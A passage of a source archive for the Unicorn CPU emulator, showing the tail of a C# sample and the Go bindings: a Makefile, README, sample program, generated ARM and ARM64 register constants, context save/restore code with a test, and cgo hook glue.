EDX = buffer size var edxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); var ecx = Utils.ToInt(ecxBuffer); var edx = Utils.ToInt(edxBuffer); // read the buffer in var size = Math.Min(256, edx); var buffer = new byte[size]; u.MemRead(ecx, buffer); var content = Encoding.Default.GetString(buffer); Console.WriteLine($"[!] Interrupt 0x{eip:X}: num {ecx:X}, SYS_WRITE. buffer = 0x{edx:X}, size = {size:X}, content = '{content}'"); break; } } } } unicorn-2.1.1/bindings/go/000077500000000000000000000000001467524106700154065ustar00rootroot00000000000000unicorn-2.1.1/bindings/go/Makefile000066400000000000000000000004251467524106700170470ustar00rootroot00000000000000# Go binding for Unicorn engine. Ryan Hileman .PHONY: all gen_const test all: gen_const cd unicorn && go build gen_const: cd .. && python3 const_generator.py go test: all cd unicorn && LD_LIBRARY_PATH=../../../ DYLD_LIBRARY_PATH=../../../ go test unicorn-2.1.1/bindings/go/README.md000066400000000000000000000015611467524106700166700ustar00rootroot00000000000000To download/update the Unicorn Go bindings, run: go get -u github.com/unicorn-engine/unicorn/bindings/go A very basic usage example follows _(Does not handle most errors for brevity. 
Please see sample.go for a more hygenic example):_ package main import ( "fmt" uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" ) func main() { mu, _ := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_32) // mov eax, 1234 code := []byte{184, 210, 4, 0, 0} mu.MemMap(0x1000, 0x1000) mu.MemWrite(0x1000, code) if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { panic(err) } eax, _ := mu.RegRead(uc.X86_REG_EAX) fmt.Printf("EAX is now: %d\n", eax) } An example program exercising far more Unicorn functionality and error handling can be found in sample.go. unicorn-2.1.1/bindings/go/sample.go000066400000000000000000000052171467524106700172230ustar00rootroot00000000000000package main import ( "encoding/hex" "fmt" uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" "strings" ) var asm = strings.Join([]string{ "48c7c003000000", // mov rax, 3 "0f05", // syscall "48c7c700400000", // mov rdi, 0x4000 "488907", // mov [rdi], rdx "488b07", // mov rdx, [rdi] "4883c201", // add rdx, 1 }, "") func addHooks(mu uc.Unicorn) { mu.HookAdd(uc.HOOK_BLOCK, func(mu uc.Unicorn, addr uint64, size uint32) { fmt.Printf("Block: 0x%x, 0x%x\n", addr, size) }, 1, 0) mu.HookAdd(uc.HOOK_CODE, func(mu uc.Unicorn, addr uint64, size uint32) { fmt.Printf("Code: 0x%x, 0x%x\n", addr, size) }, 1, 0) mu.HookAdd(uc.HOOK_MEM_READ|uc.HOOK_MEM_WRITE, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) { if access == uc.MEM_WRITE { fmt.Printf("Mem write") } else { fmt.Printf("Mem read") } fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) }, 1, 0) invalid := uc.HOOK_MEM_READ_INVALID | uc.HOOK_MEM_WRITE_INVALID | uc.HOOK_MEM_FETCH_INVALID mu.HookAdd(invalid, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) bool { switch access { case uc.MEM_WRITE_UNMAPPED | uc.MEM_WRITE_PROT: fmt.Printf("invalid write") case uc.MEM_READ_UNMAPPED | uc.MEM_READ_PROT: fmt.Printf("invalid read") case uc.MEM_FETCH_UNMAPPED | uc.MEM_FETCH_PROT: fmt.Printf("invalid fetch") default: fmt.Printf("unknown memory error") } fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) return false }, 1, 0) mu.HookAdd(uc.HOOK_INSN, func(mu uc.Unicorn) { rax, _ := mu.RegRead(uc.X86_REG_RAX) fmt.Printf("Syscall: %d\n", rax) }, 1, 0, uc.X86_INS_SYSCALL) } func run() error { code, err := hex.DecodeString(asm) if err != nil { return err } // set up unicorn instance and add hooks mu, err := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_64) if err != nil { return err } addHooks(mu) // map and write code to memory if err := mu.MemMap(0x1000, 0x1000); err != nil { return err } if err := mu.MemWrite(0x1000, code); err != nil { return err } // map scratch space if err := mu.MemMap(0x4000, 0x1000); err != nil { return err } // set example register if err := mu.RegWrite(uc.X86_REG_RDX, 1); err != nil { return err } rdx, err := mu.RegRead(uc.X86_REG_RDX) if err != nil { return err } fmt.Printf("RDX is: %d\n", rdx) // start emulation if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { return err } // read back example register rdx, err = mu.RegRead(uc.X86_REG_RDX) if err != nil { return err } fmt.Printf("RDX is now: %d\n", rdx) return nil } func main() { if err := run(); err != nil { fmt.Println(err) } } unicorn-2.1.1/bindings/go/unicorn/000077500000000000000000000000001467524106700170635ustar00rootroot00000000000000unicorn-2.1.1/bindings/go/unicorn/arm64_const.go000066400000000000000000000154561467524106700215640ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
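// (A hedged pointer, based on the Go bindings Makefile earlier in this
// archive: its gen_const target runs `python3 const_generator.py`, which
// regenerates the *_const.go files that follow, so corrections belong in the
// generator rather than in these generated sources.)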
AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.go] const ( // ARM64 CPU CPU_ARM64_A57 = 0 CPU_ARM64_A53 = 1 CPU_ARM64_A72 = 2 CPU_ARM64_MAX = 3 CPU_ARM64_ENDING = 4 // ARM64 registers ARM64_REG_INVALID = 0 ARM64_REG_X29 = 1 ARM64_REG_X30 = 2 ARM64_REG_NZCV = 3 ARM64_REG_SP = 4 ARM64_REG_WSP = 5 ARM64_REG_WZR = 6 ARM64_REG_XZR = 7 ARM64_REG_B0 = 8 ARM64_REG_B1 = 9 ARM64_REG_B2 = 10 ARM64_REG_B3 = 11 ARM64_REG_B4 = 12 ARM64_REG_B5 = 13 ARM64_REG_B6 = 14 ARM64_REG_B7 = 15 ARM64_REG_B8 = 16 ARM64_REG_B9 = 17 ARM64_REG_B10 = 18 ARM64_REG_B11 = 19 ARM64_REG_B12 = 20 ARM64_REG_B13 = 21 ARM64_REG_B14 = 22 ARM64_REG_B15 = 23 ARM64_REG_B16 = 24 ARM64_REG_B17 = 25 ARM64_REG_B18 = 26 ARM64_REG_B19 = 27 ARM64_REG_B20 = 28 ARM64_REG_B21 = 29 ARM64_REG_B22 = 30 ARM64_REG_B23 = 31 ARM64_REG_B24 = 32 ARM64_REG_B25 = 33 ARM64_REG_B26 = 34 ARM64_REG_B27 = 35 ARM64_REG_B28 = 36 ARM64_REG_B29 = 37 ARM64_REG_B30 = 38 ARM64_REG_B31 = 39 ARM64_REG_D0 = 40 ARM64_REG_D1 = 41 ARM64_REG_D2 = 42 ARM64_REG_D3 = 43 ARM64_REG_D4 = 44 ARM64_REG_D5 = 45 ARM64_REG_D6 = 46 ARM64_REG_D7 = 47 ARM64_REG_D8 = 48 ARM64_REG_D9 = 49 ARM64_REG_D10 = 50 ARM64_REG_D11 = 51 ARM64_REG_D12 = 52 ARM64_REG_D13 = 53 ARM64_REG_D14 = 54 ARM64_REG_D15 = 55 ARM64_REG_D16 = 56 ARM64_REG_D17 = 57 ARM64_REG_D18 = 58 ARM64_REG_D19 = 59 ARM64_REG_D20 = 60 ARM64_REG_D21 = 61 ARM64_REG_D22 = 62 ARM64_REG_D23 = 63 ARM64_REG_D24 = 64 ARM64_REG_D25 = 65 ARM64_REG_D26 = 66 ARM64_REG_D27 = 67 ARM64_REG_D28 = 68 ARM64_REG_D29 = 69 ARM64_REG_D30 = 70 ARM64_REG_D31 = 71 ARM64_REG_H0 = 72 ARM64_REG_H1 = 73 ARM64_REG_H2 = 74 ARM64_REG_H3 = 75 ARM64_REG_H4 = 76 ARM64_REG_H5 = 77 ARM64_REG_H6 = 78 ARM64_REG_H7 = 79 ARM64_REG_H8 = 80 ARM64_REG_H9 = 81 ARM64_REG_H10 = 82 ARM64_REG_H11 = 83 ARM64_REG_H12 = 84 ARM64_REG_H13 = 85 ARM64_REG_H14 = 86 ARM64_REG_H15 = 87 ARM64_REG_H16 = 88 ARM64_REG_H17 = 89 ARM64_REG_H18 = 90 ARM64_REG_H19 = 91 ARM64_REG_H20 = 92 ARM64_REG_H21 = 93 ARM64_REG_H22 = 94 ARM64_REG_H23 = 95 ARM64_REG_H24 = 96 ARM64_REG_H25 = 97 ARM64_REG_H26 = 98 ARM64_REG_H27 = 99 ARM64_REG_H28 = 100 ARM64_REG_H29 = 101 ARM64_REG_H30 = 102 ARM64_REG_H31 = 103 ARM64_REG_Q0 = 104 ARM64_REG_Q1 = 105 ARM64_REG_Q2 = 106 ARM64_REG_Q3 = 107 ARM64_REG_Q4 = 108 ARM64_REG_Q5 = 109 ARM64_REG_Q6 = 110 ARM64_REG_Q7 = 111 ARM64_REG_Q8 = 112 ARM64_REG_Q9 = 113 ARM64_REG_Q10 = 114 ARM64_REG_Q11 = 115 ARM64_REG_Q12 = 116 ARM64_REG_Q13 = 117 ARM64_REG_Q14 = 118 ARM64_REG_Q15 = 119 ARM64_REG_Q16 = 120 ARM64_REG_Q17 = 121 ARM64_REG_Q18 = 122 ARM64_REG_Q19 = 123 ARM64_REG_Q20 = 124 ARM64_REG_Q21 = 125 ARM64_REG_Q22 = 126 ARM64_REG_Q23 = 127 ARM64_REG_Q24 = 128 ARM64_REG_Q25 = 129 ARM64_REG_Q26 = 130 ARM64_REG_Q27 = 131 ARM64_REG_Q28 = 132 ARM64_REG_Q29 = 133 ARM64_REG_Q30 = 134 ARM64_REG_Q31 = 135 ARM64_REG_S0 = 136 ARM64_REG_S1 = 137 ARM64_REG_S2 = 138 ARM64_REG_S3 = 139 ARM64_REG_S4 = 140 ARM64_REG_S5 = 141 ARM64_REG_S6 = 142 ARM64_REG_S7 = 143 ARM64_REG_S8 = 144 ARM64_REG_S9 = 145 ARM64_REG_S10 = 146 ARM64_REG_S11 = 147 ARM64_REG_S12 = 148 ARM64_REG_S13 = 149 ARM64_REG_S14 = 150 ARM64_REG_S15 = 151 ARM64_REG_S16 = 152 ARM64_REG_S17 = 153 ARM64_REG_S18 = 154 ARM64_REG_S19 = 155 ARM64_REG_S20 = 156 ARM64_REG_S21 = 157 ARM64_REG_S22 = 158 ARM64_REG_S23 = 159 ARM64_REG_S24 = 160 ARM64_REG_S25 = 161 ARM64_REG_S26 = 162 ARM64_REG_S27 = 163 ARM64_REG_S28 = 164 ARM64_REG_S29 = 165 ARM64_REG_S30 = 166 ARM64_REG_S31 = 167 ARM64_REG_W0 = 168 ARM64_REG_W1 = 169 ARM64_REG_W2 = 170 ARM64_REG_W3 = 171 ARM64_REG_W4 = 172 ARM64_REG_W5 = 173 ARM64_REG_W6 = 174 ARM64_REG_W7 = 175 ARM64_REG_W8 = 
176 ARM64_REG_W9 = 177 ARM64_REG_W10 = 178 ARM64_REG_W11 = 179 ARM64_REG_W12 = 180 ARM64_REG_W13 = 181 ARM64_REG_W14 = 182 ARM64_REG_W15 = 183 ARM64_REG_W16 = 184 ARM64_REG_W17 = 185 ARM64_REG_W18 = 186 ARM64_REG_W19 = 187 ARM64_REG_W20 = 188 ARM64_REG_W21 = 189 ARM64_REG_W22 = 190 ARM64_REG_W23 = 191 ARM64_REG_W24 = 192 ARM64_REG_W25 = 193 ARM64_REG_W26 = 194 ARM64_REG_W27 = 195 ARM64_REG_W28 = 196 ARM64_REG_W29 = 197 ARM64_REG_W30 = 198 ARM64_REG_X0 = 199 ARM64_REG_X1 = 200 ARM64_REG_X2 = 201 ARM64_REG_X3 = 202 ARM64_REG_X4 = 203 ARM64_REG_X5 = 204 ARM64_REG_X6 = 205 ARM64_REG_X7 = 206 ARM64_REG_X8 = 207 ARM64_REG_X9 = 208 ARM64_REG_X10 = 209 ARM64_REG_X11 = 210 ARM64_REG_X12 = 211 ARM64_REG_X13 = 212 ARM64_REG_X14 = 213 ARM64_REG_X15 = 214 ARM64_REG_X16 = 215 ARM64_REG_X17 = 216 ARM64_REG_X18 = 217 ARM64_REG_X19 = 218 ARM64_REG_X20 = 219 ARM64_REG_X21 = 220 ARM64_REG_X22 = 221 ARM64_REG_X23 = 222 ARM64_REG_X24 = 223 ARM64_REG_X25 = 224 ARM64_REG_X26 = 225 ARM64_REG_X27 = 226 ARM64_REG_X28 = 227 ARM64_REG_V0 = 228 ARM64_REG_V1 = 229 ARM64_REG_V2 = 230 ARM64_REG_V3 = 231 ARM64_REG_V4 = 232 ARM64_REG_V5 = 233 ARM64_REG_V6 = 234 ARM64_REG_V7 = 235 ARM64_REG_V8 = 236 ARM64_REG_V9 = 237 ARM64_REG_V10 = 238 ARM64_REG_V11 = 239 ARM64_REG_V12 = 240 ARM64_REG_V13 = 241 ARM64_REG_V14 = 242 ARM64_REG_V15 = 243 ARM64_REG_V16 = 244 ARM64_REG_V17 = 245 ARM64_REG_V18 = 246 ARM64_REG_V19 = 247 ARM64_REG_V20 = 248 ARM64_REG_V21 = 249 ARM64_REG_V22 = 250 ARM64_REG_V23 = 251 ARM64_REG_V24 = 252 ARM64_REG_V25 = 253 ARM64_REG_V26 = 254 ARM64_REG_V27 = 255 ARM64_REG_V28 = 256 ARM64_REG_V29 = 257 ARM64_REG_V30 = 258 ARM64_REG_V31 = 259 // pseudo registers ARM64_REG_PC = 260 ARM64_REG_CPACR_EL1 = 261 // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TPIDR_EL0 = 262 ARM64_REG_TPIDRRO_EL0 = 263 ARM64_REG_TPIDR_EL1 = 264 ARM64_REG_PSTATE = 265 // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_ELR_EL0 = 266 ARM64_REG_ELR_EL1 = 267 ARM64_REG_ELR_EL2 = 268 ARM64_REG_ELR_EL3 = 269 // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_SP_EL0 = 270 ARM64_REG_SP_EL1 = 271 ARM64_REG_SP_EL2 = 272 ARM64_REG_SP_EL3 = 273 // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TTBR0_EL1 = 274 ARM64_REG_TTBR1_EL1 = 275 ARM64_REG_ESR_EL0 = 276 ARM64_REG_ESR_EL1 = 277 ARM64_REG_ESR_EL2 = 278 ARM64_REG_ESR_EL3 = 279 ARM64_REG_FAR_EL0 = 280 ARM64_REG_FAR_EL1 = 281 ARM64_REG_FAR_EL2 = 282 ARM64_REG_FAR_EL3 = 283 ARM64_REG_PAR_EL1 = 284 ARM64_REG_MAIR_EL1 = 285 ARM64_REG_VBAR_EL0 = 286 ARM64_REG_VBAR_EL1 = 287 ARM64_REG_VBAR_EL2 = 288 ARM64_REG_VBAR_EL3 = 289 ARM64_REG_CP_REG = 290 // floating point control and status registers ARM64_REG_FPCR = 291 ARM64_REG_FPSR = 292 ARM64_REG_ENDING = 293 // alias registers ARM64_REG_IP0 = 215 ARM64_REG_IP1 = 216 ARM64_REG_FP = 1 ARM64_REG_LR = 2 // ARM64 instructions ARM64_INS_INVALID = 0 ARM64_INS_MRS = 1 ARM64_INS_MSR = 2 ARM64_INS_SYS = 3 ARM64_INS_SYSL = 4 ARM64_INS_ENDING = 5 )unicorn-2.1.1/bindings/go/unicorn/arm_const.go000066400000000000000000000072251467524106700214050ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [arm_const.go] const ( // ARM CPU CPU_ARM_926 = 0 CPU_ARM_946 = 1 CPU_ARM_1026 = 2 CPU_ARM_1136_R2 = 3 CPU_ARM_1136 = 4 CPU_ARM_1176 = 5 CPU_ARM_11MPCORE = 6 CPU_ARM_CORTEX_M0 = 7 CPU_ARM_CORTEX_M3 = 8 CPU_ARM_CORTEX_M4 = 9 CPU_ARM_CORTEX_M7 = 10 CPU_ARM_CORTEX_M33 = 11 CPU_ARM_CORTEX_R5 = 12 CPU_ARM_CORTEX_R5F = 13 CPU_ARM_CORTEX_A7 = 14 CPU_ARM_CORTEX_A8 = 15 CPU_ARM_CORTEX_A9 = 16 CPU_ARM_CORTEX_A15 = 17 CPU_ARM_TI925T = 18 CPU_ARM_SA1100 = 19 CPU_ARM_SA1110 = 20 CPU_ARM_PXA250 = 21 CPU_ARM_PXA255 = 22 CPU_ARM_PXA260 = 23 CPU_ARM_PXA261 = 24 CPU_ARM_PXA262 = 25 CPU_ARM_PXA270 = 26 CPU_ARM_PXA270A0 = 27 CPU_ARM_PXA270A1 = 28 CPU_ARM_PXA270B0 = 29 CPU_ARM_PXA270B1 = 30 CPU_ARM_PXA270C0 = 31 CPU_ARM_PXA270C5 = 32 CPU_ARM_MAX = 33 CPU_ARM_ENDING = 34 // ARM registers ARM_REG_INVALID = 0 ARM_REG_APSR = 1 ARM_REG_APSR_NZCV = 2 ARM_REG_CPSR = 3 ARM_REG_FPEXC = 4 ARM_REG_FPINST = 5 ARM_REG_FPSCR = 6 ARM_REG_FPSCR_NZCV = 7 ARM_REG_FPSID = 8 ARM_REG_ITSTATE = 9 ARM_REG_LR = 10 ARM_REG_PC = 11 ARM_REG_SP = 12 ARM_REG_SPSR = 13 ARM_REG_D0 = 14 ARM_REG_D1 = 15 ARM_REG_D2 = 16 ARM_REG_D3 = 17 ARM_REG_D4 = 18 ARM_REG_D5 = 19 ARM_REG_D6 = 20 ARM_REG_D7 = 21 ARM_REG_D8 = 22 ARM_REG_D9 = 23 ARM_REG_D10 = 24 ARM_REG_D11 = 25 ARM_REG_D12 = 26 ARM_REG_D13 = 27 ARM_REG_D14 = 28 ARM_REG_D15 = 29 ARM_REG_D16 = 30 ARM_REG_D17 = 31 ARM_REG_D18 = 32 ARM_REG_D19 = 33 ARM_REG_D20 = 34 ARM_REG_D21 = 35 ARM_REG_D22 = 36 ARM_REG_D23 = 37 ARM_REG_D24 = 38 ARM_REG_D25 = 39 ARM_REG_D26 = 40 ARM_REG_D27 = 41 ARM_REG_D28 = 42 ARM_REG_D29 = 43 ARM_REG_D30 = 44 ARM_REG_D31 = 45 ARM_REG_FPINST2 = 46 ARM_REG_MVFR0 = 47 ARM_REG_MVFR1 = 48 ARM_REG_MVFR2 = 49 ARM_REG_Q0 = 50 ARM_REG_Q1 = 51 ARM_REG_Q2 = 52 ARM_REG_Q3 = 53 ARM_REG_Q4 = 54 ARM_REG_Q5 = 55 ARM_REG_Q6 = 56 ARM_REG_Q7 = 57 ARM_REG_Q8 = 58 ARM_REG_Q9 = 59 ARM_REG_Q10 = 60 ARM_REG_Q11 = 61 ARM_REG_Q12 = 62 ARM_REG_Q13 = 63 ARM_REG_Q14 = 64 ARM_REG_Q15 = 65 ARM_REG_R0 = 66 ARM_REG_R1 = 67 ARM_REG_R2 = 68 ARM_REG_R3 = 69 ARM_REG_R4 = 70 ARM_REG_R5 = 71 ARM_REG_R6 = 72 ARM_REG_R7 = 73 ARM_REG_R8 = 74 ARM_REG_R9 = 75 ARM_REG_R10 = 76 ARM_REG_R11 = 77 ARM_REG_R12 = 78 ARM_REG_S0 = 79 ARM_REG_S1 = 80 ARM_REG_S2 = 81 ARM_REG_S3 = 82 ARM_REG_S4 = 83 ARM_REG_S5 = 84 ARM_REG_S6 = 85 ARM_REG_S7 = 86 ARM_REG_S8 = 87 ARM_REG_S9 = 88 ARM_REG_S10 = 89 ARM_REG_S11 = 90 ARM_REG_S12 = 91 ARM_REG_S13 = 92 ARM_REG_S14 = 93 ARM_REG_S15 = 94 ARM_REG_S16 = 95 ARM_REG_S17 = 96 ARM_REG_S18 = 97 ARM_REG_S19 = 98 ARM_REG_S20 = 99 ARM_REG_S21 = 100 ARM_REG_S22 = 101 ARM_REG_S23 = 102 ARM_REG_S24 = 103 ARM_REG_S25 = 104 ARM_REG_S26 = 105 ARM_REG_S27 = 106 ARM_REG_S28 = 107 ARM_REG_S29 = 108 ARM_REG_S30 = 109 ARM_REG_S31 = 110 ARM_REG_C1_C0_2 = 111 ARM_REG_C13_C0_2 = 112 ARM_REG_C13_C0_3 = 113 ARM_REG_IPSR = 114 ARM_REG_MSP = 115 ARM_REG_PSP = 116 ARM_REG_CONTROL = 117 ARM_REG_IAPSR = 118 ARM_REG_EAPSR = 119 ARM_REG_XPSR = 120 ARM_REG_EPSR = 121 ARM_REG_IEPSR = 122 ARM_REG_PRIMASK = 123 ARM_REG_BASEPRI = 124 ARM_REG_BASEPRI_MAX = 125 ARM_REG_FAULTMASK = 126 ARM_REG_APSR_NZCVQ = 127 ARM_REG_APSR_G = 128 ARM_REG_APSR_NZCVQG = 129 ARM_REG_IAPSR_NZCVQ = 130 ARM_REG_IAPSR_G = 131 ARM_REG_IAPSR_NZCVQG = 132 ARM_REG_EAPSR_NZCVQ = 133 ARM_REG_EAPSR_G = 134 ARM_REG_EAPSR_NZCVQG = 135 ARM_REG_XPSR_NZCVQ = 136 ARM_REG_XPSR_G = 137 ARM_REG_XPSR_NZCVQG = 138 ARM_REG_CP_REG = 139 ARM_REG_ENDING = 140 // alias registers ARM_REG_R13 = 12 ARM_REG_R14 = 10 ARM_REG_R15 = 11 ARM_REG_SB = 75 ARM_REG_SL = 76 ARM_REG_FP = 77 ARM_REG_IP = 78 
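	// Note that the alias constants above reuse the canonical indices
	// (ARM_REG_R13 = 12 = ARM_REG_SP, ARM_REG_R14 = 10 = ARM_REG_LR,
	// ARM_REG_R15 = 11 = ARM_REG_PC), so reading or writing either name
	// touches the same underlying register.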
)unicorn-2.1.1/bindings/go/unicorn/context.go000066400000000000000000000011441467524106700210760ustar00rootroot00000000000000package unicorn import ( "runtime" "unsafe" ) // #include <unicorn/unicorn.h> import "C" type Context **C.uc_context func (u *uc) ContextSave(reuse Context) (Context, error) { ctx := reuse if ctx == nil { ctx = new(*C.uc_context) } if err := errReturn(C.uc_context_alloc(u.handle, ctx)); err != nil { return nil, err } runtime.SetFinalizer(ctx, func(p Context) { C.uc_free(unsafe.Pointer(*p)) }) if err := errReturn(C.uc_context_save(u.handle, *ctx)); err != nil { return nil, err } return ctx, nil } func (u *uc) ContextRestore(ctx Context) error { return errReturn(C.uc_context_restore(u.handle, *ctx)) } unicorn-2.1.1/bindings/go/unicorn/context_test.go000066400000000000000000000006601467524106700221370ustar00rootroot00000000000000package unicorn import ( "testing" ) func TestContext(t *testing.T) { u, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } u.RegWrite(X86_REG_EBP, 100) ctx, err := u.ContextSave(nil) if err != nil { t.Fatal(err) } u.RegWrite(X86_REG_EBP, 200) err = u.ContextRestore(ctx) if err != nil { t.Fatal(err) } val, _ := u.RegRead(X86_REG_EBP) if val != 100 { t.Fatal("context restore failed") } } unicorn-2.1.1/bindings/go/unicorn/hook.c000066400000000000000000000032661467524106700201760ustar00rootroot00000000000000#include <unicorn/unicorn.h> #include "_cgo_export.h" uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end) { return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end); } uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn) { return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end, insn); } void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user) { hookCode(handle, addr, size, (void *)user); } bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { return hookMemInvalid(handle, type, addr, size, value, (void *)user); } void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { hookMemAccess(handle, type, addr, size, value, (void *)user); } void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user) { hookInterrupt(handle, intno, (void *)user); } uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user) { return hookX86In(handle, port, size, (void *)user); } void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user) { hookX86Out(handle, port, size, value, (void *)user); } void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user) { hookX86Syscall(handle, (void *)user); } unicorn-2.1.1/bindings/go/unicorn/hook.go000066400000000000000000000076501467524106700203600ustar00rootroot00000000000000package unicorn import ( "errors" "sync" "unsafe" ) /* #include <unicorn/unicorn.h> #include "hook.h" */ import "C" type HookData struct { Uc Unicorn Callback interface{} } type Hook uint64 type fastHookMap struct { vals []*HookData sync.RWMutex } func (m *fastHookMap) insert(h *HookData) uintptr { // don't change this to defer m.Lock() for i, v := range m.vals { if v == nil { m.vals[i] = h m.Unlock() return uintptr(i) } } i := len(m.vals) m.vals =
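	// Design note (a hedged reading of this file): cgo forbids passing Go
	// pointers into C, so HookData values live only in this Go-side slice and
	// just the integer slot index crosses the boundary as the C callback's
	// user-data; the nil-slot scan above recycles indices released by remove().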
append(m.vals, h) m.Unlock() return uintptr(i) } func (m *fastHookMap) get(i unsafe.Pointer) *HookData { m.RLock() // TODO: nil check? v := m.vals[uintptr(i)] m.RUnlock() return v } func (m *fastHookMap) remove(i uintptr) { m.Lock() m.vals[i] = nil m.Unlock() } var hookMap fastHookMap //export hookCode func hookCode(handle unsafe.Pointer, addr uint64, size uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint64, uint32))(hook.Uc, uint64(addr), uint32(size)) } //export hookMemInvalid func hookMemInvalid(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) bool { hook := hookMap.get(user) return hook.Callback.(func(Unicorn, int, uint64, int, int64) bool)(hook.Uc, int(typ), addr, size, value) } //export hookMemAccess func hookMemAccess(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, int, uint64, int, int64))(hook.Uc, int(typ), addr, size, value) } //export hookInterrupt func hookInterrupt(handle unsafe.Pointer, intno uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint32))(hook.Uc, intno) } //export hookX86In func hookX86In(handle unsafe.Pointer, port, size uint32, user unsafe.Pointer) uint32 { hook := hookMap.get(user) return hook.Callback.(func(Unicorn, uint32, uint32) uint32)(hook.Uc, port, size) } //export hookX86Out func hookX86Out(handle unsafe.Pointer, port, size, value uint32, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn, uint32, uint32, uint32))(hook.Uc, port, size, value) } //export hookX86Syscall func hookX86Syscall(handle unsafe.Pointer, user unsafe.Pointer) { hook := hookMap.get(user) hook.Callback.(func(Unicorn))(hook.Uc) } func (u *uc) HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) { var callback unsafe.Pointer var insn C.int var insnMode bool switch htype { case HOOK_BLOCK, HOOK_CODE: callback = C.hookCode_cgo case HOOK_MEM_READ, HOOK_MEM_WRITE, HOOK_MEM_READ | HOOK_MEM_WRITE: callback = C.hookMemAccess_cgo case HOOK_INTR: callback = C.hookInterrupt_cgo case HOOK_INSN: insn = C.int(extra[0]) insnMode = true switch insn { case X86_INS_IN: callback = C.hookX86In_cgo case X86_INS_OUT: callback = C.hookX86Out_cgo case X86_INS_SYSCALL, X86_INS_SYSENTER: callback = C.hookX86Syscall_cgo default: return 0, errors.New("Unknown instruction type.") } default: // special case for mask if htype&(HOOK_MEM_READ_UNMAPPED|HOOK_MEM_WRITE_UNMAPPED|HOOK_MEM_FETCH_UNMAPPED| HOOK_MEM_READ_PROT|HOOK_MEM_WRITE_PROT|HOOK_MEM_FETCH_PROT) != 0 { callback = C.hookMemInvalid_cgo } else { return 0, errors.New("Unknown hook type.") } } var h2 C.uc_hook data := &HookData{u, cb} uptr := hookMap.insert(data) if insnMode { C.uc_hook_add_insn(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end), insn) } else { C.uc_hook_add_wrap(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end)) } // TODO: could move Hook and uptr onto HookData and just return it u.hooks[Hook(h2)] = uptr return Hook(h2), nil } func (u *uc) HookDel(hook Hook) error { if uptr, ok := u.hooks[hook]; ok { delete(u.hooks, hook) hookMap.remove(uptr) } return errReturn(C.uc_hook_del(u.handle, C.uc_hook(hook))) } unicorn-2.1.1/bindings/go/unicorn/hook.h000066400000000000000000000016431467524106700202000ustar00rootroot00000000000000uc_err uc_hook_add_wrap(uc_engine 
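/* A hedged note on this header: cgo cannot call variadic C functions, so the
   variadic uc_hook_add() is reached through the fixed-arity wrappers defined
   in hook.c and declared here; uc_hook_add_insn exists solely to forward the
   extra instruction-id argument used by UC_HOOK_INSN hooks. */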
*handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end); uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn); void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user); bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user); uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user); void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user); void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user); 